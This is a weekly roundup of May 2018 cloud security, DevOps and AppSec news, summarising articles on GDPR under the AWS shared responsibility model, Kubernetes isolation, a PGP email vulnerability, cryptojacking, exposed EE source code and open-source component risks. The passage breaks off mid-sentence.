A Review of the Best News of the Week on Cloud Security, DevOps, AppSec

The AWS Shared Responsibility Model and GDPR (AWS Security Blog, May 15 2018)
How does the AWS Shared Responsibility Model change under GDPR? The short answer – it doesn’t. AWS is responsible for securing the underlying infrastructure that supports the cloud and the services provided; while customers and APN partners, acting either as data controllers or data processors, are responsible for any personal data they put in the cloud.

Exploring container security: Isolation at different layers of the Kubernetes stack (Google Cloud Platform Blog, May 11 2018)
“To conclude our blog series on container security, today’s post covers isolation, and when containers are appropriate for actually, well… containing. While containers bring great benefits to your development pipeline and provide some resource separation, they were not designed to provide a strong security boundary.”

Details on a New PGP Vulnerability (Schneier on Security, May 14 2018)
Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

Sponsored by LogRhythm
SIEM Magic Quadrant
Gartner Positions LogRhythm in SIEM Leaders Quadrant for 5th Consecutive Year. Get the report

Calculating Cloud Cost: 8 Factors to Watch (Dark Reading, May 09 2018)
If you’re not careful and don’t regularly assess the impact of your usage, moving to the cloud could have a negative impact on your bottom line.

25% of Businesses Targeted with Cryptojacking in the Cloud (Dark Reading, May 16 2018)
New public cloud security report detects a spike in cryptojacking, mismanaged cloud storage, account takeover, and major patches getting overlooked.

How AWS Meets a Physical Separation Requirement with a Logical Separation Approach (AWS Security Blog, May 09 2018)
…a three-pronged logical separation approach that leverages virtualization, encryption, and deploying compute to dedicated hardware.

Microsoft Makes Bid for IoT Devices with Linux and CASB (IT Pro, May 15 2018)
Microsoft Azure Sphere may provide a way for enterprises to ensure IoT device security deployments through long life cycles.

Containers are here. What about container security? (CSO Online, May 15 2018)
ESG data indicates that cybersecurity pros have problems around the nuances of container technology and implementing container-centric security controls.

Protect virtual machines across different subscriptions with Azure Security Center (Microsoft Azure Blog, May 15 2018)
“We heard from our customers that they wanted an even simpler onboarding experience to Azure Security Center. Today, we are excited to announce the general availability of Azure Security Center’s Cross Subscription Workspace Selection. This capability allows you to collect and monitor data in one location from virtual machines that run in different workspaces, subscriptions, and run queries.”

Smashing Silos and Building Bridges in the IT-Infosec Divide (Dark Reading, May 14 2018)
A strong relationship between IT and security leads to strong defense, but it’s not always easy getting the two to collaborate.

2 million lines of source code left exposed by phone company EE (Naked Security – Sophos, May 14 2018)
EE, which at 30 million customers is the UK’s largest mobile network, was formerly known as Everything Everywhere. Anybody could simply view what should have been private: namely, EE’s Amazon Web Services (AWS) keys, application programming interface (API) keys, and more.

How the Kubernetes Security Response Team Works (eSecurity Planet: Internet Security for IT Professionals, May 16 2018)
In a video interview, Brandon Philips, former CTO of CoreOS, now at Red Hat, and a member of the volunteer team that handles Kubernetes security reports, details how security reports are handled and how the CVE-2017-1002101 issue was managed.

Losses, Not Breaches, Drive AppSec Investment (Infosecurity Magazine, May 09 2018)
A new report looks at the impact that apps running in unsecured environments pose to businesses.

Ready or Not: Transport Layer Security 1.3 Is Coming (Dark Reading, May 10 2018)
Better encryption could mean weaker security if you’re not careful.

Facebook Suspends 200 Apps Over Data Misuse (SecurityWeek, May 14 2018)
Facebook said Monday it has suspended “around 200” apps on its platform as part of an investigation into misuse of private user data.

Taming the Chaos of Application Security: ‘We Built an App for That’ (Dark Reading, May 15 2018)
Want to improve the state of secure software coding? Hide the complexity from developers.

Automating web app testing to secure your environment (Help Net Security, May 15 2018)
…product manager for web application security at Qualys talking about web application security, and specifically about automating some of the testing of web applications, as well as APIs to help secure web applications in your environment.

Deleted Signal Messages Linger on macOS (SecurityWeek, May 15 2018)
Messages from the Signal desktop application for Mac are not deleted from the machine, but are instead copied to the notifications bar, where they persist, a security researcher warns.

Flaws in Open Source Components Pose Increasing Risk to Apps: Study (SecurityWeek, May 15 2018)
Open source components have been increasingly used by developers, but failure to patch vulnerabilities in this type of software can pose serious risks.

The good, the bad & the ugly of using open source code components (CSO Online, May 09 2018)

The developer’s role in securing component use
Open source and third-party component use is shifting from optional to best practice, and even necessary. It’s simply impossible for developers to keep up in today’s digital world without incorporating these pre-fabricated code snippets into their applications.At CA Veracode, we analyze the data from our platform every year to create our State of Software Security report, and we’ve been using this data to sound the alarm about the insecurity of co